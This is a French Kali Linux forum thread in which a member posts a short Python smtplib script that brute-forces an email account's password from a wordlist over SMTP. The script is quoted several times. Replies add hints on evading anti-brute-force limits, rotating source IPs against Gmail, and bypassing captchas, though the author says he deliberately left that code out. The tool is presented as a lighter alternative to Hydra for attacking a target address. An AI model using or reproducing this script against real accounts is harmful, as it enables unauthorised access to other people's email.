Auteur Sujet: Ya pas qu'Hydra dans la vie  (Lu 1575 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 602
  • +34/-5
Ya pas qu'Hydra dans la vie
« le: 01 octobre 2019 à 23:35:08 »
Parce qu'il est tard et que je suis insomniaque et que j'aime bien python.
13 lignes de code qui evite de sortir Hydra pour test en attaque par dico une adresse mail.
Dans cet exemple je passe via le port 587 en SSL
Pour des raisons evidentes je ne poste que le partie qui s'occupe de la requete et du check du password  ;D

import smtplib
smtpserver = smtplib.SMTP("smtp.XXX.com", 587)  # Remplacer par SMTP cible
smtpserver.ehlo()
smtpserver.starttls()
user = "xxx@xxxx.com"  # Remplacer par email cible
pass_file = open("/home/fichier.txt", "r") # Chemin acces dico password
 
for entrees in pass_file:
try:
smtpserver.login(user, entrees)
print "\033[32mBINGO ! %s\033[0m" % entrees
break;
except smtplib.SMTPAuthenticationError:
pass

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1435
  • +100/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Ya pas qu'Hydra dans la vie
« Réponse #1 le: 02 octobre 2019 à 07:52:02 »
C'est cool python quand même...  ;)
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Ya pas qu'Hydra dans la vie
« Réponse #2 le: 02 octobre 2019 à 07:52:57 »
Quel petit malin ce john :3
Mess  with the bests.
Die like the rest.

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3793
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Ya pas qu'Hydra dans la vie
« Réponse #3 le: 02 octobre 2019 à 09:38:32 »
Parce qu'il est tard et que je suis insomniaque et que j'aime bien python.
13 lignes de code qui evite de sortir Hydra pour test en attaque par dico une adresse mail.
Dans cet exemple je passe via le port 587 en SSL
Pour des raisons evidentes je ne poste que le partie qui s'occupe de la requete et du check du password  ;D

import smtplib
smtpserver = smtplib.SMTP("smtp.XXX.com", 587)  # Remplacer par SMTP cible
smtpserver.ehlo()
smtpserver.starttls()
user = "xxx@xxxx.com"  # Remplacer par email cible
pass_file = open("/home/fichier.txt", "r") # Chemin acces dico password
 
for entrees in pass_file:
try:
smtpserver.login(user, entrees)
print "\033[32mBINGO ! %s\033[0m" % entrees
break;
except smtplib.SMTPAuthenticationError:
pass
Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Ya pas qu'Hydra dans la vie
« Réponse #4 le: 02 octobre 2019 à 09:52:19 »
Je prefères autant que tu ne postes pas ça en  effet ;)
Mess  with the bests.
Die like the rest.

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 602
  • +34/-5
Re : Re : Ya pas qu'Hydra dans la vie
« Réponse #5 le: 02 octobre 2019 à 09:56:12 »

Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Ya pas qu'Hydra dans la vie
« Réponse #6 le: 02 octobre 2019 à 09:59:25 »
+1 john :)
Mess  with the bests.
Die like the rest.

Hors ligne Shakim

  • Membre Junior
  • *
  • Messages: 48
  • +2/-0
Re : Re : Re : Ya pas qu'Hydra dans la vie
« Réponse #7 le: 02 octobre 2019 à 11:01:43 »

Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)

 Merci beaucoup pour le partage.
Au vue de la montagne de science évoquée ici, peut t-on rapidement et théoriquement expliquer (sans ligne de code) comment un bypass de captcha et un "un tips qui change l'ip sender " fonctionnent ?  :o
A ma connaissance, le seul bypass de captcha viable que je connaisse c'est les application qui soutraite des petites mains pour valider des captcha en série.
Coté changement d'ip sender... Si vous changez l'ip du sender dans la trame, le paquet n'est pas sensé revenir puisqu'il est utilisé pour la réponse, si ?
« Modifié: 02 octobre 2019 à 11:13:11 par Shakim »

Hors ligne WarLocG

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 474
  • +67/-0
  • Spé Code Python Java Bash
Re : Re : Ya pas qu'Hydra dans la vie
« Réponse #8 le: 02 octobre 2019 à 11:17:00 »
Parce qu'il est tard et que je suis insomniaque et que j'aime bien python.
13 lignes de code qui evite de sortir Hydra pour test en attaque par dico une adresse mail.
Dans cet exemple je passe via le port 587 en SSL
Pour des raisons evidentes je ne poste que le partie qui s'occupe de la requete et du check du password  ;D

import smtplib
smtpserver = smtplib.SMTP("smtp.XXX.com", 587)  # Remplacer par SMTP cible
smtpserver.ehlo()
smtpserver.starttls()
user = "xxx@xxxx.com"  # Remplacer par email cible
pass_file = open("/home/fichier.txt", "r") # Chemin acces dico password
 
for entrees in pass_file:
try:
smtpserver.login(user, entrees)
print "\033[32mBINGO ! %s\033[0m" % entrees
break;
except smtplib.SMTPAuthenticationError:
pass
Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Je pense au contraire que tout y est dans la "version d'origine" ^^
Regarde la première ligne avec le import, on ne voit pas le #!/bin/python ni le coding et il est tout à fait déductible qu'il y a encore d'autres import

La boucle pour tester le dico y est, c'est le "for entrees in pass_file:" :)

Si tu regardes la fin avec le "pass", tu peux également déduire qu'il y a bien assez de place pour y mettre le sleep et quelques tests conditionnels et autres itérations supplémentaires en sortie du try/except :)

Citer
Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)
Tout est dit :)
A lire avant de poser vos questions : http://www.linux-france.org/article/these/smart-questions/smart-questions-fr.html
Pour les questions de base sous debian : https://debian-facile.org/index-df.php
Veuillez utiliser la fonction Rechercher avant de poster.

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3793
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Ya pas qu'Hydra dans la vie
« Réponse #9 le: 02 octobre 2019 à 11:26:33 »
ça permet d'en savoir plus sur le code sans tout dévoiler :D

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Ya pas qu'Hydra dans la vie
« Réponse #10 le: 02 octobre 2019 à 11:37:51 »
surtout que le script donne déjà beaucoup d'informations si l'on prend la peine de chercher :)
Mess  with the bests.
Die like the rest.

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Re : Re : Re : Ya pas qu'Hydra dans la vie
« Réponse #11 le: 02 octobre 2019 à 11:39:28 »

Il manque la boucle qui va tester chaque ligne du dictionnaire et faire une pause pour éviter les système anti-brute-force.
Par contre pour gmail il faudra également rajouter un tips qui change l'ip sender de la requête parce qu'après 3 tentative il te mettra un faux succès pour déjouer ce type d'attaque.

Désolé de ne pas poster le code de la partie dont je parle, depuis le temps que je n'ai plus pratiqué, je suis rouillé en python mais les habitué on compris le système ;)

Salut Coyotus,
C'est à dessin que je n'ai pas posté les boucles de tempos, les bypass anti-capcha et les loops proxy car je ne voulais pas que ce sript soit copy & paste et utilisé par le 1er script-kiddy venu  ;)
L'idée c'était plus de se dire que parfois on s'emmerde avec des lourd outils alors que quelques lignes de code font le job  8)

 Merci beaucoup pour le partage.
Au vue de la montagne de science évoquée ici, peut t-on rapidement et théoriquement expliquer (sans ligne de code) comment un bypass de captcha et un "un tips qui change l'ip sender " fonctionnent ?  :o
A ma connaissance, le seul bypass de captcha viable que je connaisse c'est les application qui soutraite des petites mains pour valider des captcha en série.
Coté changement d'ip sender... Si vous changez l'ip du sender dans la trame, le paquet n'est pas sensé revenir puisqu'il est utilisé pour la réponse, si ?

Une recherche te donnera toutes les réponses ;)
Mess  with the bests.
Die like the rest.

Hors ligne Koma

  • Membre sérieux
  • ***
  • Messages: 268
  • +23/-5
  • Don't panick, i'll be back.
Re : Ya pas qu'Hydra dans la vie
« Réponse #12 le: 02 octobre 2019 à 18:47:56 »
Oui ok c'est bien mais du coup, comment je hack facebook ?  ::) ::)
But first : let me google that for you.

Copyright Réservé SNK inc. "C'est pas un McDrive ici !"
Copyright réservé ZeR0 TM "Ce n'est pas flunch ici"

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Ya pas qu'Hydra dans la vie
« Réponse #13 le: 02 octobre 2019 à 18:57:13 »
tu peux télécharger mon soft ici qui va te le faire automatiquement :

www.howtofuckyourpc.com
Mess  with the bests.
Die like the rest.